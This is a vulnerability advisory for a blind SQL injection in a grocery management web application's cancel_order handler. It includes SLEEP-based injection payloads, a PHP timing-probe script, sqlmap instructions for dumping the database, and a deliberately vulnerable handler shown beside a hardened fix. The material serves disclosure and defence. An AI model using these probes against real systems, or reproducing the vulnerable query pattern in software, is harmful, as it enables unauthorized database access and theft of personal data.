CVE-2026-14694
Status: Received - Intake

SQL Injection in Multi-Vendor Online Grocery Management System

Vulnerability report for CVE-2026-14694, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-07-05

Last updated on: 2026-07-05

Assigner: VulDB

Description

A vulnerability has been found in SourceCodester Multi-Vendor Online Grocery Management System 1.0. Affected by this issue is the function cancel_order of the file classes/Master.php of the component POST Parameter Handler. The manipulation of the argument ID leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.


Meta Information

Published
2026-07-05
Last Modified
2026-07-05
Generated
2026-07-05
AI Q&A
2026-07-05
EPSS Evaluated
N/A

Affected Vendors & Products

Showing 1 associated CPE
Vendor Product Version / Range
sourcecodester multi-vendor_online_grocery_management_system 1.0

Exploitability

CWE ID Description
CWE-74 The product constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.
CWE-89 The product constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component. Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data.

Executive Summary

This vulnerability is a time-based blind SQL injection in the cancel_order function of the Multi-Vendor Online Grocery Management System 1.0 (classes/Master.php). The id field of the POST request is concatenated into a SQL UPDATE statement without validation or parameterization, so a remote attacker controls part of the query that the database executes.

Because the handler's response contains neither query results nor database error messages, UNION-based and error-based techniques give no feedback. The injection is still fully exploitable by inference: a payload such as id=1 AND SLEEP(5) stalls the response while MySQL evaluates the injected condition, and conditional delays can then be used to extract data from the database one bit or one character at a time.

The root cause is the use of PHP's extract($_POST), which turns the attacker-supplied id field into a local variable that is interpolated into the query string without validation or a prepared statement.

Impact Analysis

This vulnerability can allow an attacker to remotely execute SQL injection attacks to extract sensitive information from the database, including user credentials, personal data, and database schema details.

The handler can be reached without authenticating, and the application in any case allows open public registration, so any remote party can point an automated tool such as sqlmap at the id parameter and dump the entire database.

This can lead to data breaches, unauthorized data access, and compromise of the integrity and availability of the system.

Detection Guidance

The cancel_order endpoint can be tested for time-based blind SQL injection. Because the handler returns no query results or database errors, UNION-based and error-based checks give no signal; the reliable check is to inject MySQL's SLEEP() into the id parameter and compare the response time with that of a benign request.

Automated tools such as sqlmap can find and exploit the flaw by targeting the id parameter of a POST request to the cancel_order endpoint.

  • Run sqlmap against the cancel_order endpoint as a POST request with the id parameter selected for testing; limiting it to time-based techniques and to MySQL shortens the run.
  • Manually send POST requests with a payload such as id=1 AND SLEEP(5) and compare the response time with that of id=1. Use an order id that exists (the WHERE clause is evaluated per matching row, so a non-existent id produces no delay), repeat each measurement, and confirm with a second delay value such as SLEEP(10) so that ordinary network latency is not mistaken for injection. Do not use OR-based payloads against this UPDATE statement: they would change every row in the table.
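
The timing check described above, written as a PHP CLI script. This is an added example for this advisory, not code from the page, SourceCodester or VulDB. It assumes the handler answers at classes/Master.php?f=cancel_order, that the POST field is named id, that order id 1 exists, and that it is run only against a test instance you are allowed to probe; the payload list and the 80 % threshold are this example's choices. The decision logic is separated from the HTTP transport (the $send callable) so it can be exercised against a stub.

```php
<?php
// Added example for this advisory; not code from the page, SourceCodester or VulDB.
// Assumptions: the handler answers at classes/Master.php?f=cancel_order, the POST
// field is named id, and order id 1 exists on a test instance you may probe.
declare(strict_types=1);

const TARGET    = 'http://127.0.0.1/grocery/classes/Master.php?f=cancel_order'; // assumed path
const BENIGN_ID = '1'; // constructed: an existing order id. "WHERE id = 1 AND SLEEP(n)"
                       // only sleeps for rows that match, so a missing id shows no delay.

/** Probe values that should each stall the response by $delay seconds. */
function payloads(int $delay): array
{
    // Never use "1 OR SLEEP(n)" here: against an UPDATE it would modify every row.
    return [
        'numeric'         => "1 AND SLEEP({$delay})",     // payload quoted by the advisory
        'numeric-comment' => "1 AND SLEEP({$delay})-- -", // assumption: MySQL line comment
    ];
}

/** POST id=<value> and return the wall-clock seconds until the response (or timeout). */
function timedPost(string $url, string $idValue, int $timeout = 30): float
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_POST           => true,
        CURLOPT_POSTFIELDS     => http_build_query(['id' => $idValue]),
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT        => $timeout,
    ]);
    $start = microtime(true);
    curl_exec($ch); // an error or a timeout is still a timing sample
    curl_close($ch);
    return microtime(true) - $start;
}

function median(array $xs): float
{
    sort($xs);
    $n = count($xs);
    $mid = intdiv($n, 2);
    return $n % 2 ? (float) $xs[$mid] : ($xs[$mid - 1] + $xs[$mid]) / 2;
}

/** True when the probe's median exceeds the baseline median by most of the requested delay. */
function isDelayed(array $baseline, array $probe, int $delay, float $fraction = 0.8): bool
{
    return median($probe) - median($baseline) >= $fraction * $delay;
}

/**
 * $send(string $idValue): float is injected so the decision logic can run against a stub.
 * Two different delays must both reproduce: a slow link adds a constant, not something
 * that scales with the SLEEP() argument.
 */
function confirm(callable $send, array $delays = [3, 6], int $rounds = 3): array
{
    $baseline = [];
    for ($i = 0; $i < $rounds; $i++) {
        $baseline[] = $send(BENIGN_ID);
    }
    $hits = [];
    foreach ($delays as $delay) {
        foreach (payloads($delay) as $label => $value) {
            $probe = [];
            for ($i = 0; $i < $rounds; $i++) {
                $probe[] = $send($value);
            }
            $hits[$label][$delay] = isDelayed($baseline, $probe, $delay);
        }
    }
    $vulnerable = false;
    foreach ($hits as $perDelay) {
        if (!in_array(false, $perDelay, true)) {
            $vulnerable = true; // one payload shape reproduced for every delay value
        }
    }
    return ['baseline_median' => median($baseline), 'hits' => $hits, 'vulnerable' => $vulnerable];
}

if (PHP_SAPI === 'cli') {
    $url = $argv[1] ?? TARGET;
    var_export(confirm(fn (string $v): float => timedPost($url, $v)));
    echo PHP_EOL;
}
```

Run it as `php probe.php http://host/path/classes/Master.php?f=cancel_order`. Each probe request that reaches the database cancels order 1 on the test instance, which is the expected side effect of exercising an UPDATE handler; do not run this against a production system.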
Mitigation Strategies

Immediate mitigation is to validate the id parameter in the cancel_order function and to fix the other endpoints that build SQL the same way.

  • Cast or validate the id parameter as an integer before it reaches the query. intval() stops the injection, but it silently maps "1 AND SLEEP(5)" to 1 and carries on; rejecting non-integer input (filter_var() with FILTER_VALIDATE_INT) is preferable because probes then fail visibly.
  • Use prepared statements with bound parameters for every query, so that the value is never parsed as SQL regardless of its type.
  • Review and fix other endpoints with the same pattern, such as delete_cart, update_cart_qty, and delete_users.
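
The vulnerable handler shape beside a hardened one, as an added example for this advisory rather than SourceCodester's own classes/Master.php. The table name order_list, the status column, the value 4 meaning "cancelled", and the mysqli connection in $conn are assumptions; the pattern of extract($_POST) feeding a string-built UPDATE is the one the advisory describes.

```php
<?php
// Added example for this advisory; not SourceCodester's own classes/Master.php.
// Assumptions: a mysqli connection in $conn, an order_list table with a status
// column, and status 4 meaning "cancelled".
declare(strict_types=1);

/** Vulnerable shape: the POST field becomes $id and is pasted into the query text. */
function cancel_order_vulnerable(mysqli $conn): string
{
    extract($_POST);                                   // $id now holds whatever the client sent
    $sql = "UPDATE order_list SET status = 4 WHERE id = {$id}";
    $conn->query($sql);                                // id=1 AND SLEEP(5) stalls for 5 s
    return json_encode(['status' => 'success']);
}

/** Hardened shape: reject anything that is not a positive integer, then bind it. */
function cancel_order_fixed(mysqli $conn): string
{
    // FILTER_VALIDATE_INT yields false for "1 AND SLEEP(5)" and null when id is absent;
    // intval() would silently turn the same string into 1 and hide the probe.
    $id = filter_input(INPUT_POST, 'id', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false || $id === null) {
        http_response_code(400);
        return json_encode(['status' => 'failed', 'msg' => 'invalid id']);
    }

    $stmt = $conn->prepare('UPDATE order_list SET status = 4 WHERE id = ?');
    $stmt->bind_param('i', $id);                       // the value never becomes SQL text
    $stmt->execute();
    $changed = $stmt->affected_rows === 1;
    $stmt->close();
    return json_encode(['status' => $changed ? 'success' : 'failed']);
}
```

With the hardened version a probe of id=1 AND SLEEP(5) receives an HTTP 400 instead of a five-second stall, and the same two-step shape (validate the type, bind the value) applies directly to delete_cart, update_cart_qty and delete_users.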

Since the vulnerability is exploitable remotely and without authentication, consider restricting access to the application or applying temporary firewall rules to limit exposure until the code has been fixed.

Compliance Impact

The SQL injection vulnerability in the cancel_order function allows attackers to extract sensitive information such as user credentials and personal data from the database. This exposure of personal data can lead to non-compliance with data protection regulations like GDPR and HIPAA, which require the protection of personal and sensitive information against unauthorized access and breaches.

Because the vulnerability enables remote exploitation by unauthenticated users and can result in the disclosure of personal data, organizations using the affected system may face legal and regulatory consequences if they fail to secure the system adequately.
